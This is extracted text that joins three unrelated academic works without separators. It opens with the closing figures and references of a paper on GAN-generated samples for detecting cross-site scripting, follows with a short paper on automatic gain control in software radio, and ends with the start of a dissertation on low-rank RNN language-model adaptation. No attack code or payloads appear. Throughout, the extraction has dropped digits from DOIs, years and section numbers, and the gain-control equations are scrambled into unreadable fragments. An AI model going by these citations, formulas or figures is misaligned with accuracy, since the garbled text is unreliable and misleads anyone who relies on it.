html_tag_script . . . t . . html_tag_script . . . u . . html_tag_script . . . v . . html_tag_script . . . w . . html_tag_script . . . x . . html_tag_script . . . js _s tr in g_ m ax _l en gt h y . . html_tag_script . . . z . . html_tag_script . . . aa . . html_tag_script . . . bb . . html_tag_script . . . cc . . html_tag_script . . . dd . . html_tag_script . . . js _s tr in g_ m ax _l en gt h ee . . html_tag_script . . . ff . . html_tag_script . . . gg . . html_tag_script . . . hh . . html_tag_script . . . ii . . html_tag_script . . . jj . . html_tag_script . . . js _s tr in g_ m ax _l en gt h kk . . html_tag_script . . . ll . . html_tag_script . . . mm . . html_tag_script . . . nn . . html_tag_script . . . oo . . html_tag_script . . . pp training step training step training step training step training step training step training step figure (a-pp) general visualization of sample generation for c-wgan-gp compared to other gen- erative methods. full-size doi: . /peerjcs. /fig- c-wgan-gp method can be extended to other forms of attacks and other fields, including the medical field, where datasets are highly unbalanced. for future work, we will investigate network training stability to generate data using various designs over different network architectures. it is a significant problem worthy of further research. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • fawaz mahiuob mohammed mokbal conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • dan wang conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, supervising work, and approved the final draft. • xiaoxi wang analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. • lihua fu analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data deposition the following information was supplied regarding data availability: all raw data are available as supplemental files. additional data are available at figshare: mokbal, fawaz ( ): cross-site scripting attack (xss) dataset. figshare. dataset. https://doi.org/ . /m .figshare. .v . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references andreeva o, gordeychik s, gritsai g, kochetova o, potseluevskaya e, sidorov si, timorin aa. . industrial control systems vulnerabilities statistics. kaspersky lab, report doi . /rg. . . . . arjovsky m, chintala s, bottou l. . wasserstein generative adversarial networks. in: th international conference on machine learning, icml , vol. . – . borji a. . pros and cons of gan evaluation measures. computer vision and image understanding : – doi . /j.cviu. . . . buda m, maki a, mazurowski ma. . a systematic study of the class imbalance problem in convolutional neural networks. neural networks : – doi . /j.neunet. . . . bunkhumpornpat c, sinapiromsaran k, lursinsap c. . dbsmote: density- based synthetic minority over-sampling technique. applied intelligence : – doi . /s - - -y. chen t, guestrin c. . xgboost: a scalable tree boosting system. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining - kdd ’ . new york: acm press, – doi . / . . deepa g, thilagam ps. . securing web applications from injection and logic vulnerabilities: approaches and challenges. information and software technology : – doi . /j.infsof. . . . douzas g, bacao f. . effective data generation for imbalanced learning using conditional generative adversarial networks. expert systems with applications : – doi . /j.eswa. . . . mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /rg. . . . http://dx.doi.org/ . /j.cviu. . . http://dx.doi.org/ . /j.neunet. . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. elkan c. . the foundations of cost-sensitive learning. in: ijcai international joint conference on artificial intelligence. – . goodfellow ij, pouget-abadie j, mirza m, xu b, warde-farley d, ozair s, courville a, bengio y. . generative adversarial nets. advances in neural information processing systems : – . gulrajani i, ahmed f, arjovsky m, dumoulin v, courville a. . improved training of wasserstein gans. in: advances in neural information processing systems - december. – . haixiang g, yijing l, shang j, mingyun g, yuanyue h, bing g. . learning from class-imbalanced data: review of methods and applications. expert systems with applications : – doi . /j.eswa. . . . han h, wang wy, mao bh. . borderline-smote: a new over-sampling method in imbalanced data sets learning. in: international conference on intelligent computing. berlin, heidelberg: springer, – . he h, bai y, garcia ea, li s. . adasyn: adaptive synthetic sampling approach for imbalanced learning. in: proceedings of the international joint conference on neural networks. – doi . /ijcnn. . . kovács b, tinya f, németh c, Ódor p. . smote: synthetic minority over-sampling technique nitesh. ecological applications : – doi . /eap. . lekies s, kotowicz k, grob s, nava eav, johns m. . code-reuse attacks for theweb: breaking cross-site scripting mitigations via script gadgets. in: proceedings of the acm conference on computer and communications security. new york: acm press, – doi . / . . lópez v, fernández a, garcía s, palade v, herrera f. . an insight into classification with imbalanced data: empirical results and current trends on using data intrinsic characteristics. information sciences : – doi . /j.ins. . . . lucic m, kurach k, michalski m, bousquet o, gelly s. . are gans created equal? a large-scale study. in: advances in neural information processing systems - december. – . mirza m, osindero s. . conditional generative adversarial nets. arxiv preprint. arxiv: . . mitropoulos d, spinellis d. . fatal injection: a survey of modern code injection attack countermeasures. peerj computer science :e doi . /peerj-cs. . mokbal fmm, dan w, imran a, jiuchuan l, akhtar f, xiaoxi w. . mlpxss: an integrated xss-based attack detection scheme in web applications using multilayer perceptron technique. ieee access : – doi . /access. . . national institute of standards and technology. . national vulnerability database (nvd), vulnerabilities. available at https://nvd.nist.gov/vuln. nunan ae, souto e, dossantos em, feitosa e. . automatic classification of cross- site scripting in web pages using document-based and url-based features. in: ieee symposium on computers and communications (iscc). piscataway: ieee, – doi . /iscc. . . mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /ijcnn. . http://dx.doi.org/ . /eap. http://dx.doi.org/ . / . http://dx.doi.org/ . /j.ins. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /access. . https://nvd.nist.gov/vuln http://dx.doi.org/ . /iscc. . http://dx.doi.org/ . /peerj-cs. obimbo c, ali k, mohamed k. . using ids to prevent xss attacks. in: int’ l conf. security and management. – . pan z, yu w, yi x, khan a, yuan f, zheng y. . recent progress on gener- ative adversarial networks (gans): a survey. ieee access : – doi . /access. . . precise security. . cross-site scripting (xss) makes nearly % of all cyber attacks in - precisesecurity.com. available at https://www.precisesecurity.com/articles/ cross-site-scripting-xss-makes-nearly- -of-all-cyber-attacks-in- / (accessed on february ). rathore s, sharma pk, park jh. . xssclassifier: an efficient xss attack detection approach based on machine learning classifier on snss. journal of information processing systems : – doi . /jips. . . sarmah u, bhattacharyya dk, kalita jk. . a survey of detection methods for xss attacks. journal of network and computer applications : – doi . /j.jnca. . . . sharafaldin i, habibilashkari a, ghorbani aa. . toward generating a new intrusion detection dataset and intrusion traffic characterization. in: proceedings of the th international conference on information systems security and privacy - volume : icissp. – doi . / . villani c. . optimal transport, old and new. berlin: springer berlin heidelberg doi . / - - - - . vluymans s. . learning from imbalanced data. studies in computational intelligence : – doi . / - - - - _ . wang y, cai w, wei p. . a deep learning approach for detecting malicious javascript code. security and communication networks : – doi . /sec. . wang r, jia x, li q, zhang s. . machine learning based cross-site scripting detection in online social network. in: proceedings - th ieee international conference on high performance computing and communications, hpcc , th ieee international conference on embedded software and systems, icess and th international symposium on cyberspace safety and security. piscataway: ieee, – doi . /hpcc. . . wang r, zhu y, tan j, zhou b. . detection of malicious web pages based on hybrid analysis. journal of information security and applications : – doi . /j.jisa. . . . zhou y, wang p. . an ensemble learning approach for xss attack detection with domain knowledge and threat intelligence. computers and security : – doi . /j.cose. . . . mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /access. . https://www.precisesecurity.com/articles/cross-site-scripting-xss-makes-nearly- -of-all-cyber-attacks-in- / https://www.precisesecurity.com/articles/cross-site-scripting-xss-makes-nearly- -of-all-cyber-attacks-in- / http://dx.doi.org/ . /jips. . http://dx.doi.org/ . /j.jnca. . . http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /sec. http://dx.doi.org/ . /hpcc. . http://dx.doi.org/ . /j.jisa. . . http://dx.doi.org/ . /j.cose. . . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , application of agc technology in software radio wu hejing east university of heilongjiang e-mail: wuhejing @ .com abstract—the characteristics of software radio are flexibility, openness, scalability. the hardware platform of software radio should be a general platform. this paper discusses automatic gain control(agc) technology in software radio receiver and introduces an agc algorithm applicable for dsp implement. this algorithm is tested in matlab and simulation results are provided. keywords-software radio; characteristics; agc; matlab i. introduction at present, software radio technology is widely used in wireless communication, its basic idea is to use hardware as the basic platform of wireless communication. the a/d sampling data of signals are processed by various algorithms, and various communication functions are realized by means of software. this paper discusses the automatic gain control (agc) algorithm in software radio. the function of agc is to automatically adjust the gain of the amplifier according to the strength of the input signal received. keep the output signal basically unchanged when the input signal changes in strength. an efficient agc scheme suitable for dsp operation is proposed, which has fast convergence and accurate steady-state response characteristics. moreover, it is simple to implement and can satisfy the needs of software radio system very well. ii. characteristics of software radio ( ) flexibility. software radio can be achieved by adding software modules. it's easy to add new features. it can communicate with any other radio station and act as radio frequency relay of other radio stations. ( ) openness. software radio adopts a standardized and modular structure. its hardware can be updated or expanded with the development of devices and technologies. ( ) scalability. software radio can be upgraded by loading new software. iii. architecture of software radio software radio architecture is the concrete design structure torealize the concept of software radio. it includes hardware, software and interface protocol. the design content must take into account the current situation and long-term development of wireless communication technology. really unifies each standard. the structure of ideal software radio is mainly composed of antenna, rf front end, broadband a/d-d/a soft converter, general and special digital signal processors and various software components. the antenna of software radio generally covers a wide frequency band. for example, mhz- ghz requires that the characteristics of each frequency band be uniform. to meet the needs of various businesses. the rf front-end mainly completes the tasks of up-conversion, filtering, power amplification and so on. receiving realizes filtering, amplification, down conversion, and other functions. after digitizing the analog signal, the processing task is completely completed by the dsp software. in order to reduce the processing pressure of general agc, a/d converter is usually used to transmit digital signals. after special digital signal processing devices, reducing data flow rate, after the signal is changed to baseband, the data is controlled. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , iv. software and hardware platform of software radio the hardware platform of software radio should be a general platform. it may not have the highest efficiency for a particular communication system. but its openness and scalability enable it to adapt to a variety of wireless communication systems. and it can be flexible to add, subtract and modify. first, the hardware structure of software radio designed by people is basically a streaming structure. this structure is similar to the logical structure of wireless communication system. so its efficiency is higher. however, because the direct coupling of each module in this structure is too close, there is a problem of pulling the trigger and moving the whole situation. based on this situation, bus architecture has been proposed. the bus structure has good openness. it is an ideal choice to realize software radio. there are many bus standards for industrial control bus. for example, isa, pci, eisa, vem and so on. isa bus and vme bus are widely used in current digital signal processing and industrial control. vem bus has more advantages than isa bus. the data of isa bus is bits. the address bus is bits. address space mb. its bus bandwidth is only a few mhz. the data width of vme bus is bits. there are address lines. the address space is gb. the bus bandwidth is tens of mhz. vem bus is designed for multi-processor system. the isa bus is a single processor bus. so vme bus is often used in software radio. software radio operates in the so-called "software bus" mode. its software structure consists of software modules with standard interfaces. each software module defines different application functions. the integrated operation can be achieved by inserting the bus. realize the complete communication function. the integrated operation mode of "software bus" requires the unification of software interface standards. improve software openness and reusability. realize online software sharing in multiple environments. applications based on java technology can work on various platform systems. java only needs to be written once. it can run anywhere. it is easy to implement function expansion and module embedding. it can realize the rapid opening of new business. java plays an important role in realizing software reusability. v. principle of automatic gain control by software the block diagram of the principle of automatic gain control is shown in figure .the if sampling signal x(n) is amplified by a controllable gain amplifier. the gain is a (n).the output signal y(n)= a(n)x(n),calculate the logarithmic value of the level of signal y(n).compared with reference level log(r),an error level e(n) is generated. the gain of the amplifier is continuously adjusted by negative feedback with e(n).the output log (y (n) is gradually approached to the reference level log (r) until the circuit reaches equilibrium. the parameter alpha controls the adjustment time of agc circuit, which is a constant related to time. the logarithmic and exponential operation of signal level in circuit is to make the constant of adjusting time of control circuit independent of input level. the mathematical analysis of the block diagram is as follows: figure . agc algorithm implementation principle international journal of advanced network, monitoring and controls volume , no. , the recurrence formula of magnification factor is as follows: arnxananxnaranana  ])( )[(])()([)() ( when the amplitude after passing through the if amplifier is less than r, )()( nxnar  as positive, the amplification factor increases. )(ny increases, similarly, when the magnitude is greater than r, )()( nxnar  as negative. the magnification decreases. )(ny reduce, thus small signal amplification can be realized. large signal attenuation, the signal is controlled within a certain range. suppose the input signal is )()( ncunx  aracnana  ] )[() ( )(]) ( [)( nuac c r na n  the gain after reaching a fixed state is c r ,time constant is ac the schematic diagram of agc's second scheme is as follows: figure . agc algorithm implementation principle the recursive formula is: }])()(log{}[log{)}(log{)} (log{ nxnaranana  in order to make the response time faster, before comparing with the comparative value r, the output value of the amplifier )()()( nxnany  is logarithmic before comparison. when the magnitude is less than r, })()(log{ nxna is less than }log{ r .therefore, })()(log{}log{ nxnar  is positive. the magnification becomes larger, thus, the small signal is enlarged. when the magnitude is greater than r, })()(log{ nxna is larger than }log{ r , therefore })()(log{}log{ nxnar  is negative, the amplification factor )(na decreases, thus the attenuation of large signal is realized. through the above algorithm, the small signal is enlarged, large signal attenuation. suppose the input signal is )()( ncunx  ,have }/log{] )}[(log{)} (log{ rcaanana  international journal of advanced network, monitoring and controls volume , no. , )(]) ( }[log{)}(log{ nua r c na n  as can be seen from the above formula, the gain of the stabilized signal is c r ,the time constant is approximately equal to a vi. simulation results the agc algorithm is implemented by matlab. two agc algorithms are added to the demodulation of a narrowband qpsk signal. by observing and comparing the agc output signals, the two schemes are proved to be completely feasible. the magnification becomes larger, thus, the small signal is enlarged. when the magnitude is greater than r, })()(log{ nxna is larger than }log{ r , therefore })()(log{}log{ nxnar  is negative, the amplification factor )(na decreases, thus the attenuation of large signal is realized.through the above algorithm,the simulation results of two agc schemes are shown in fig. and fig. respectively. figure . the simulation results of agc algorithm when the input signal of the first agc scheme change - - - - - - - - - - - international journal of advanced network, monitoring and controls volume , no. , figure . the simulation results of agc algorithm when the input signal of the second agc scheme changes vii. concluding remarks since the introduction of software radio,its brand-new software value concept solves the problem of wireless standard interoperability.,then it triggered a worldwide research climax. software radio receivers, whether the signal amplitude is stable or not will affect the timing synchronization and phase synchronization recovery of the receiver. this will determine whether the signal can be received with high quality, so automatic gain control (agc) is applied to the input signal. high quality signal reception can be achieved. these two agc schemes have fast convergence and accurate steady-state response characteristics, and the algorithm is simple.it is convenient for software radio system to be realized by dsp. reference [ ] research on the practical course "software radio system design and verification" [j]. duanrui, chen zhuming, zou lin. experimental science and technology. ( ) [ ] research on sopc-based software radio system [j]. yang zhengyu, li bing. microcomputer and application. ( ) [ ] application research of radar system based on software radio technology [j]. liu xiaoping. information and computer (theoretical edition). ( ) [ ] application of software radio technology in fm transmitter design [j]. sandik.digital communication world. ( ) [ ] application of software radio technology in ship communication [j]. wang huan. strait science and technology and industry. ( ) [ ] application and development of software radio technology [j]. wang hongbo. computer programming skills and maintenance. ( ) - - - - - - - - - fig. a fig. b c©copyright aaron jaech low-rank rnn adaptation for context-aware language modeling aaron jaech a dissertation submitted in partial fulfillment of the requirements for the degree of doctor of philosophy university of washington reading committee: mari ostendorf, chair hannaneh hajishirzi noah smith program authorized to offer degree: electrical engineering university of washington abstract low-rank rnn adaptation for context-aware language modeling aaron jaech chair of the supervisory committee: professor mari ostendorf electrical engineering a long-standing weakness of statistical language models is that their performance drastically degrades if they are used on data that varies even slightly from the data on which they were trained. in practice, applications require the use of adaptation methods to adjust the predictions of the model to match the local context. for instance, in a speech recognition application, a single static language model would not be able to handle all the different ways that people speak to their voice assistants such as selecting music and sending a message to a friend. an adapted model would make its predictions conditioned on the knowledge of who is speaking and what task they are trying to do. the current standard approach to recurrent neural network language model adaptation is to apply a simple linear shift to the recurrent and/or output layer bias vector. although this is helpful, it does not go far enough. this thesis introduces a new approach to adaptation, which we call the factorcell, that generates a custom recurrent network for each context by applying a low-rank transformation. the factorcell allows for a more substantial change to the recurrent layer weights. different from previous approaches, the introduction of a rank hyperparameter gives control over how different or similar the adapted models should be. in our experiments on several different datasets and multiple types of context, the in- creased adaptation of the recurrent layer is always helpful, as measured by perplexity, the standard for evaluating language models. we also demonstrate impact on two applica- tions: personalized query completion and context-specific text generation, finding that the enhanced adaptation benefits both. we also show that the factorcell provides a more ef- fective text classification model, but more importantly the classification results reveal that there are important differences between the models that are not captured by perplexity. the classification metric is particularly important for the text generation application. table of contents page list of figures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . iii list of tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v chapter : introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . key contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . thesis overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . general language modeling background . . . . . . . . . . . . . . . . . . . . . neural language modeling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . language model adaptation . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : exploring context-aware rnns . . . . . . . . . . . . . . . . . . . . . . additive bias adaptation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . comparison to related work . . . . . . . . . . . . . . . . . . . . . . . . . . . summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : factor cell model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . factorcell model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experiments with different contexts . . . . . . . . . . . . . . . . . . . . . . . analysis for sparse contexts . . . . . . . . . . . . . . . . . . . . . . . . . . . i . comparison to related work . . . . . . . . . . . . . . . . . . . . . . . . . . . summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : personalized query auto-completion . . . . . . . . . . . . . . . . . . . . background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : context-specific text generation . . . . . . . . . . . . . . . . . . . . . . text generation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . illustrative examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experiments and analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : conclusions and future directions . . . . . . . . . . . . . . . . . . . . . summary of contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . future directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . appendix a: sparse corrections for output layer adaptation . . . . . . . . . . . . a. sparse plus low-rank softmax bias adaptation . . . . . . . . . . . . . . . . . a. l penalty for bias layer fine-tuning . . . . . . . . . . . . . . . . . . . . . a. summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ii list of figures figure number page . usage of the terms “black friday” and “super bowl” on reddit during an eight year time period. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . vocabulary size in large vocabulary continuous speech recognition systems over time. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . the value of the dimension of the lstm hidden state in an unadapted model that is the strongest indicator for spanish text for three different code-switched tweets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . illustration of the factorcell architecture. . . . . . . . . . . . . . . . . . . . . accuracy vs. perplexity for different classes of models on the four word-based datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . log likelihood ratio between a model that assumes a star review and the same model that assumes a star review. blue indicates a higher star likelihood and red is a higher likelihood for the star condition. . . . . . . . . accuracy vs. perplexity for different classes of models on the two character- based datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . comparison of the effect of lstm parameter count and factorcell rank hy- perparameters on perplexity for dbpedia. . . . . . . . . . . . . . . . . . . . . distribution of a pca projection of hotel embeddings from the tripadvisor factorcell model showing the grouping of the hotels by city. . . . . . . . . . . distribution of a pca projection of the hotel embeddings from the tripad- visor factorcell model showing the grouping of hotels by class. . . . . . . . . . perplexity versus mrr on the development data for different classes of models. . relative improvement in mrr over the unpersonalized model versus queries seen using the large size models. plot uses a moving average of width to reduce noise. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . mrr by prefix and query lengths for the large factorcell and unadapted models with the first queries per user excluded. . . . . . . . . . . . . . . . iii . context classification accuracy versus generation context-specificity for each type of adaptation on the yelp data. . . . . . . . . . . . . . . . . . . . . . . . plot of factorcell rank and perplexity against generation context-specificity accuracy for factorcell models on the yelp restaurant data. . . . . . . . . . context-specificity of hotel class versus factorcell rank and perplexity in gen- erated reviews using the models learned on the tripadvisor data. . . . . . . . context classification accuracy versus generation context-specificity for each type of adaptation on the tripadvisor data. . . . . . . . . . . . . . . . . . . iv list of tables table number page . example use cases for language model adaptation . . . . . . . . . . . . . . . . approaches to rnn language model adaptation in prior work. the x indicates the use of the concatcell (cc) or the softmaxbias (sb) adaptation strategy . number of sentences, vocabulary size and context variables for the three corpora. . summary of key hyperparamters . . . . . . . . . . . . . . . . . . . . . . . . . perplexities and classification avg. aucs for reddit models . . . . . . . . . . nearest neighbors to selected subreddits in the context embedding space. . . . comparison of perplexities per subreddit . . . . . . . . . . . . . . . . . . . . . results on twitter data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . results on the scotus data in terms of perplexity and classification accuracy (acc) for the justice identification task. . . . . . . . . . . . . . . . . . . . . . perplexities for different combinations of context variables on the scotus corpus. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . sentences generated from the adapted model using beam search under different assumptions for speaker and role contexts. . . . . . . . . . . . . . . . . . . . . dataset statistics: dataset size in words (* or characters) of train, dev and test sets, vocabulary size, number of training documents, and context variables. . selected hyperparameters for each dataset. when a range is listed it means that a different values were selected for the factorcell, concatcell, soft- maxbias or unadapted models. . . . . . . . . . . . . . . . . . . . . . . . . . . perplexity and classification accuracy on the test set for the four word-based datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . perplexity and classification accuracies for the eurotwitter and geotwitter datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . the top boosted words in the softmax bias layer for different context settings in a factorcell model. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v . top five completions for the prefix ba for a cold start model with no previous queries from that user and a warm model that has seen the queries espn, sports news, nascar, yankees, and nba. . . . . . . . . . . . . . . . . . . . . mrr reported for seen and unseen prefixes for small (s) and big (b) models. . the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “high school softball” and “math homework help”. . . the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “prada handbags” and “versace eyewear”. . . . . . . . . the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “discount flights” and “yellowstone vacation packages”. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . top completions for the sentence “my boyfriend and i ate here and !” after conditioning on each star rating. . . . . . . . . . . . . . . . . . . . . . . . top completions for the sentence “this was my first time coming here and the food was ” after conditioning on each star rating. . . . . . . . top completions for the sentence “i will again” after conditioning on each star rating. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . automatically judged generation accuracy, mean absolute deviation (mad), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the yelp data. . . . . . . . . . . . . . . automatically judged generation accuracy, mean absolute deviation (mad), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the tripadvisor data. . . . . . . . . . a. perplexity on the validation set of models with no adaptation and varying softmax adaptation strategies. results are not comparable to those in chapter because of a difference in vocabulary size. . . . . . . . . . . . . . . . . . . vi acknowledgments first, i would like to thank my advisor prof. mari ostendorf for her excellent men- torship and for her constant encouragement, patience, and support. i have had the pleasure of working with her on many projects during the last five years and in each case her deep experience has been a valuable asset. i would also like to thank the other members of my thesis committee, hannaneh hajishirzi and noah smith, with whom i have had the pleasure of collaborating. my peers and colleagues at the university of washington have played a key role in my graduate experience. my interactions with them has been the most enjoyable part of my graduate education. i would like to thank ji he, hao fang, vicky zay- ats, yi luan, hao cheng, trang tran, kevin lybarger, farah nadeem, rik koncel- kedziorski, and shobhit hathi. i am very fortunate to have been able to work along- side these students. i thank arjun sondhi for the many fruitful discussions. i am grateful to the mentors i had during my internships, including henry schnei- derman, larry heck, eric ringger, and hetunandan kamisetty. each of them taught me important research skills and changed my perspective on the field. this thesis would not have been possible without the experience i gained from working with them. i thank my parents jeff and rebecca jaech, who have given me their unwavering support, unconditional love, and constant encouragement during all my many years of schooling. lastly, i acknowledge my lovely girlfriend gayoung park, who understands the struggles of a ph.d student and who has spent many long days and late nights vii working by my side. i thank her for her help and for reminding me to always have fun. viii chapter introduction . overview language is a highly adaptable means of communication and as humans we routinely vary our usage of it to match our environment. changes in language from one setting to another can include large differences in topic, register, politeness, etc. depending on a host of vari- ables such as the social context, the medium of communication, the time and location, and the task at hand. if statistical language models can be made to mimic this contextual adapt- ability, then they will be useful in a wider range of applications, including speech recognition, machine translation, abstractive summarization, text generation, and more. without context awareness, static models are incredibly brittle, meaning they are “ex- tremely sensitive to changes in the style, topic, or genre” (rosenfeld, ). performance drastically degrades when a model is used in a context other than the one for which it was trained. an early study looked at incorporating text from the associated press for modeling contemporaneous articles from the wall street journal (rosenfeld, ). even though the difference in style between two american news organizations is relatively minor compared to the variations in language that are likely to be observed in other applications, the associated press text was practically useless for this task. unfortunately, it is often the case that there is a limited amount of text available for learning a language model to characterize a particular context. therefore, researchers have long sought ways to more effectively use different sources of data. this area of research is often referred to as domain adaptation, characterized by making use of data from multiple contexts to target a particular context. domain adaptation has been explored for a wide variety of contexts, as shown in table . . as an illustration of the importance of context, figure . : usage of the terms “black friday” and “super bowl” on reddit during an eight year time period. figure . shows the bursty variation of the frequency of two terms in eight years of text from reddit. mentions of these two events increase in likelihood by several orders of magnitude during predictable but narrow windows of time. this illustrates both why models that ignore context are brittle and why there is so much to be gained from adaptation. context is often represented by partitioning data into in-domain and out-of-domain sets. the in-domain data is considered to be sampled from the same or a similar distribution as the evaluation data and the out-of-domain data is everything else. a simple adaptation method is to build separate models for the in-domain corpus and out-of-domain corpora and then choose the interpolation weights to give the best performance on the in-domain data. there can be multiple out-of-domain corpora that are treated separately but typically no attempt is made to model the similarities or differences between domains/contexts. the problem with this adaptation approach is that the notions of discrete domains are much too crude when the goal is to mimic the fine-grained contextual adaptations that humans typically employ. category purpose topic adjust to variations in topic across documents or in speech. this is the most popular use case for adaptation techniques. temporal changing language usage patterns over time (rosenfeld, ; os- borne et al., ; yogatama et al., ) geographic variations in speaking style in different geographic regions (eisenstein et al., ; chelba et al., ; halpern et al., ) modality adapt a model trained on written text for use in conversational speech (bulyko et al., ; jaech and ostendorf, ; mendels et al., ) language share information between similar languages (ragni et al., ; östling and tiedemann, ) tv programs & youtube channels adapt to styles and topics of different television shows (chen et al., ; deena et al., ) lectures, talks, & meetings use text from slides, lecture titles, and other written materials to bias language model in speech recognition (schwarm et al., ; glass et al., ; hsu and glass, ; hoang et al., ) dialog state generate an appropriate response given the dialog state (riccardi and gorin, ; liu and lane, ) personalization match the model predictions to the style of each individual from a large group (tseng et al., ; li et al., ) table . : example use cases for language model adaptation in the newspaper example, instead of relying solely on a single binary variable indicating domain membership (ap vs. wsj), additional contextual variables could have been used. for example, we could have a variable to indicate which section of the paper the article appeared in, or who the author was, or the date of publication. in general, the context representation can leverage multiple discrete and continuous variables—the more expressive the contextual representation, the greater the ability of the model to adapt to it. ideally, a context-aware language model could model text using the style of one newspaper and the topic of a different publication. while researchers have tried to do this with class language models, equating word class sequences with style, many real-world applications are best characterized by interacting combinations of several contextual factors. therefore, this thesis investigates models that can use rich context representations. language is often produced in association with some information about its context. for example, in speech recognition, if a user is speaking to a personal assistant then the system might know the time of day or the identity of the task that the user is trying to accomplish. if the user takes a picture of a sign to translate it with their smart phone, the system would have contextual information related to the geographic location and the user’s preferred language. the probability of certain terms and phrases appearing can change dramatically with respect to geographic location (chelba and shazeer, ). when adapting to context information, the language model conditions on both the con- text and the previous words in the sequence. it is computing p(w :n|context). the mech- anism for computing p(w :n) impacts the approach for accounting for context. recurrent neural networks (rnns) have been shown to be very effective language models compared to previous approaches such as n-gram models or maximum entropy models (mikolov et al., ), in part because they are able to make use of arbitrarily long word histories. rnn based language models are the focus of this thesis due to their recent successes and current widespread use. improvements in adapting rnns are likely to have a positive impact on multiple tasks. in addition, the continuous-space approach is well-suited to characterizing multiple contextual variables. the standard method of adapting rnn language models is due to mikolov and zweig ( ) and involves learning an embedding to represent the context (originally the output of a topic model but any type of learned embedding will work) and including it via concatenation as an additional input to the model. we refer to this method of adapting the recurrent layer as the concatcell because of its reliance on concatenation of the context embedding. as we will show later on, when using this adaptation method most of the parameters of the model are static with respect to context. we propose a more powerful mechanism for using a context vector, which we call the factorcell. rather than simply using context as an additional input, it is used to control a factored (low-rank) transformation of the recurrent layer weight matrix. the motivation is that allowing a greater fraction of the model parameters to be adjusted in response to the input context will produce a model that is more adaptable and responsive to that context. in addition, we introduce a mechanism for handling new contexts that emerge after the model has been trained 